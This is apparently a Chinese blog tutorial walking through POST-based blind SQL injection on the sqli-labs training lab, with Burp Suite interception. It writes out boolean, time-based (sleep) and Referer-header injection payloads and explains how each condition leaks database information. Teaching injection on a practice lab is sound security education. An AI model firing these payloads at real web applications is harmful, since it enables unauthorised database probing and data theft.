SQL注入-POST方式SQL注入(二)

1.1 POST盲注

1.1.1 布尔型盲注

1.1.1.1  burpsuite开启截断

打开http://192.168.10.159/sqli-labs/Less-15/ 后开启burpsuite截断:

图片[1]|SQL注入-POST方式SQL注入(二)|leon的博客

1.1.1.2  提交表单数据

图片[2]|SQL注入-POST方式SQL注入(二)|leon的博客

1.1.1.3  修改表单提交的内容进行SQL注入

修改字符串:uname=admin‘ and (length(database())=8) –+ &passwd=admin&submit=Submit

图片[3]|SQL注入-POST方式SQL注入(二)|leon的博客

1.1.2 时间型盲注

修改字符串:uname=admin‘ and (select if(length(database())>1, sleep(3),null)) –+ &passwd=admin&submit=Submit

【字段解释】:

  • if(length(database())> 1,sleep(3),null)):条件成功则睡眠3秒,否则直接返回
  • length(database())> 1:判断条件
  • sleep(3):当条件成功时,则执行的内容
  • null:当条件不成功时执行的内容

图片[4]|SQL注入-POST方式SQL注入(二)|leon的博客

1.1.3 Referer盲注

修改字符串:Referer: http://192.168.10.159/sqli-labs/Less-19/‘ or (length(database()))=9 or if(1=1,sleep(3),null) or ‘1’=’1

图片[5]|SQL注入-POST方式SQL注入(二)|leon的博客

【结果分析】:

(length(database())) =9 or if(1=1, sleep(3), null) or’1’= ‘1

语句中三个条件都为逻辑或,当第一个条件不成功时再执行第二个条件,第二个条件也不成功时则执行第三个,其中有一个条件执行成功时则不会向后继续执行。

以上实验中(length(database()))=9条件不成功,而后执行了if(1=1, sleep(3), null)条件,该条件中的判断为1=1,结果永远都是为真,而后执行sleep(3),最终页面响应时间是3秒。

温馨提示:本文最后更新于2022-12-20 20:57:37,已超过455天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/2290.html
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享